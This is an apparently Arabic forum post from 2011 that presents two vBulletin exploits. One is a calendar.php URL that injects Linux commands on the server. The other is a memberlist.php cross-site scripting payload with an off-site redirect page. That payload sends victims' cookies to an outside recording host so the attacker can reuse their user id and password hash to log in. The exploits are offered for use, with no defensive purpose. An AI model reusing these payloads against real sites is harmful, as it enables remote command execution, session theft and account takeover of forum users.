_ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
تأكد من وجود ملف calendar.php
إذا كان موجود إدخل هذا العنوان
http://www.example.com/vb/calendar....mma=...0;die();echo%22المتغيرات
1-example.com بإسم الموقع
2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd
______________________________________________
ثغرة vBulletin
-------------------------------------------------------------------
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:
http://vulnerable/forum/memberlist....Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%
2Ephp%3Fcook%3D%27%2B
escape%28document%2E******%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)
You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco
rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2E******%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/****** stealing code, and then to
http://www.swgmotu.com.With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?b...sword=[password hash]
-----------------------------------------------------------------------------------
موضوع: ثغرة في منتديات vBulletin في ملفcalendar.php 
الثلاثاء فبراير 22, 2011 1:04 am
